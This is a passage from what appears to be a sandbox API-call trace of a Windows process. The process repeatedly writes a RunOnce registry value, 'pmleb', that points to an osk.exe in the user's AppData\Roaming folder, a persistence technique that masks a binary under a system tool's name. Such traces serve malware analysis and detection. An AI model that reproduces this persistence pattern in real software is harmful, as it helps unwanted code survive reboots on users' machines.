uIDEvent=0x2258) returned 1 [0094.573] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.574] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.574] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.574] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.574] RegCloseKey (hKey=0x280) returned 0x0 [0094.574] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.575] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.575] SetTimer (hWnd=0x20280, nIDEvent=0x2259, uElapse=0xa, lpTimerFunc=0x0) returned 0x2259 [0094.575] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.589] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.589] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.590] KillTimer (hWnd=0x20280, uIDEvent=0x2259) returned 1 [0094.590] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.590] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.590] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.591] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.591] RegCloseKey (hKey=0x280) returned 0x0 [0094.591] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.591] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.591] SetTimer (hWnd=0x20280, nIDEvent=0x225a, uElapse=0xa, lpTimerFunc=0x0) returned 0x225a [0094.591] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.613] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.613] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.613] KillTimer (hWnd=0x20280, uIDEvent=0x225a) returned 1 [0094.613] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.614] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.614] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.614] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.614] RegCloseKey (hKey=0x280) returned 0x0 [0094.615] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.615] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.615] SetTimer (hWnd=0x20280, nIDEvent=0x225b, uElapse=0xa, lpTimerFunc=0x0) returned 0x225b [0094.615] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.620] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.620] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.620] KillTimer (hWnd=0x20280, uIDEvent=0x225b) returned 1 [0094.620] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0094.621] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.621] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.621] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.621] RegCloseKey (hKey=0x280) returned 0x0 [0094.621] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.621] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.621] SetTimer (hWnd=0x20280, nIDEvent=0x225c, uElapse=0xa, lpTimerFunc=0x0) returned 0x225c [0094.622] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.636] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.636] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.636] KillTimer (hWnd=0x20280, uIDEvent=0x225c) returned 1 [0094.636] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.637] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.637] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.637] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.637] RegCloseKey (hKey=0x280) returned 0x0 
[0094.637] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.637] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.638] SetTimer (hWnd=0x20280, nIDEvent=0x225d, uElapse=0xa, lpTimerFunc=0x0) returned 0x225d [0094.638] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.651] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.651] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.651] KillTimer (hWnd=0x20280, uIDEvent=0x225d) returned 1 [0094.651] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.652] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.652] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.652] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.652] RegCloseKey (hKey=0x280) returned 0x0 [0094.652] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.652] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.653] SetTimer (hWnd=0x20280, nIDEvent=0x225e, uElapse=0xa, lpTimerFunc=0x0) returned 0x225e [0094.653] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.681] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.681] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.681] KillTimer (hWnd=0x20280, uIDEvent=0x225e) returned 1 [0094.682] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.683] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.683] 
RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.683] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.684] RegCloseKey (hKey=0x280) returned 0x0 [0094.684] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.684] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.684] SetTimer (hWnd=0x20280, nIDEvent=0x225f, uElapse=0xa, lpTimerFunc=0x0) returned 0x225f [0094.684] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.698] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.698] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.698] KillTimer (hWnd=0x20280, uIDEvent=0x225f) returned 1 [0094.698] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.699] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.699] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.699] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.699] RegCloseKey (hKey=0x280) returned 0x0 [0094.699] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.700] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.700] SetTimer (hWnd=0x20280, nIDEvent=0x2260, uElapse=0xa, lpTimerFunc=0x0) returned 0x2260 [0094.700] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.713] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.713] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.713] KillTimer (hWnd=0x20280, uIDEvent=0x2260) returned 1 [0094.714] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.714] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.714] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.714] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.715] RegCloseKey (hKey=0x280) returned 0x0 [0094.715] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.715] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.715] SetTimer (hWnd=0x20280, nIDEvent=0x2261, uElapse=0xa, lpTimerFunc=0x0) returned 0x2261 [0094.715] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.729] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.729] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.729] KillTimer (hWnd=0x20280, uIDEvent=0x2261) returned 1 [0094.729] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.730] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.730] RegCreateKeyExA (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.730] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.730] RegCloseKey (hKey=0x280) returned 0x0 [0094.730] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.730] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.730] SetTimer (hWnd=0x20280, nIDEvent=0x2262, uElapse=0xa, lpTimerFunc=0x0) returned 0x2262 [0094.730] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.794] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.794] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.794] KillTimer (hWnd=0x20280, uIDEvent=0x2262) returned 1 [0094.794] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.794] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.795] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.795] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.795] RegCloseKey (hKey=0x280) returned 0x0 [0094.795] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.795] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0094.795] SetTimer (hWnd=0x20280, nIDEvent=0x2263, uElapse=0xa, lpTimerFunc=0x0) returned 0x2263 [0094.795] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.807] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.807] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.807] KillTimer (hWnd=0x20280, uIDEvent=0x2263) returned 1 [0094.807] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.808] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.808] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.808] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.808] RegCloseKey (hKey=0x280) returned 0x0 [0094.808] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.808] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.808] SetTimer (hWnd=0x20280, nIDEvent=0x2264, uElapse=0xa, lpTimerFunc=0x0) returned 0x2264 [0094.808] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.822] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.822] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.822] KillTimer (hWnd=0x20280, uIDEvent=0x2264) returned 1 [0094.823] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.823] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.823] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, 
dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.823] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.824] RegCloseKey (hKey=0x280) returned 0x0 [0094.824] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.824] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.824] SetTimer (hWnd=0x20280, nIDEvent=0x2265, uElapse=0xa, lpTimerFunc=0x0) returned 0x2265 [0094.824] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.838] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.838] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.838] KillTimer (hWnd=0x20280, uIDEvent=0x2265) returned 1 [0094.838] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.839] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.839] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.839] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.839] RegCloseKey (hKey=0x280) returned 0x0 [0094.839] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.839] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.839] SetTimer (hWnd=0x20280, nIDEvent=0x2266, uElapse=0xa, lpTimerFunc=0x0) returned 0x2266 
[0094.839] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.853] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.854] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.854] KillTimer (hWnd=0x20280, uIDEvent=0x2266) returned 1 [0094.854] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.854] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.855] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.855] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.855] RegCloseKey (hKey=0x280) returned 0x0 [0094.855] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.855] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.855] SetTimer (hWnd=0x20280, nIDEvent=0x2267, uElapse=0xa, lpTimerFunc=0x0) returned 0x2267 [0094.855] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0095.651] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0095.651] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0095.651] KillTimer (hWnd=0x20280, uIDEvent=0x2267) returned 1 [0095.651] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.653] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0095.653] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: 
phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0095.653] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0095.654] RegCloseKey (hKey=0x280) returned 0x0 [0095.654] IUnknown:Release (This=0x7a9740) returned 0x1 [0095.654] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.654] SetTimer (hWnd=0x20280, nIDEvent=0x2268, uElapse=0xa, lpTimerFunc=0x0) returned 0x2268 [0095.654] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0095.665] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0095.665] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0095.665] KillTimer (hWnd=0x20280, uIDEvent=0x2268) returned 1 [0095.665] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.666] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0095.666] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0095.666] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0095.666] RegCloseKey (hKey=0x280) returned 0x0 [0095.666] IUnknown:Release (This=0x7a9740) returned 0x1 [0095.666] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.666] SetTimer (hWnd=0x20280, nIDEvent=0x2269, uElapse=0xa, lpTimerFunc=0x0) returned 0x2269 [0095.666] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: 
lpMsg=0x33f7fc) returned 1 [0095.705] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0095.705] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0095.706] KillTimer (hWnd=0x20280, uIDEvent=0x2269) returned 1 [0095.706] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.706] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0095.706] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0095.707] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0095.707] RegCloseKey (hKey=0x280) returned 0x0 [0095.707] IUnknown:Release (This=0x7a9740) returned 0x1 [0095.707] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.707] SetTimer (hWnd=0x20280, nIDEvent=0x226a, uElapse=0xa, lpTimerFunc=0x0) returned 0x226a [0095.707] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0095.716] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0095.716] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0095.717] KillTimer (hWnd=0x20280, uIDEvent=0x226a) returned 1 [0095.717] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.717] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0095.717] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0095.718] RegSetValueExA (in: 
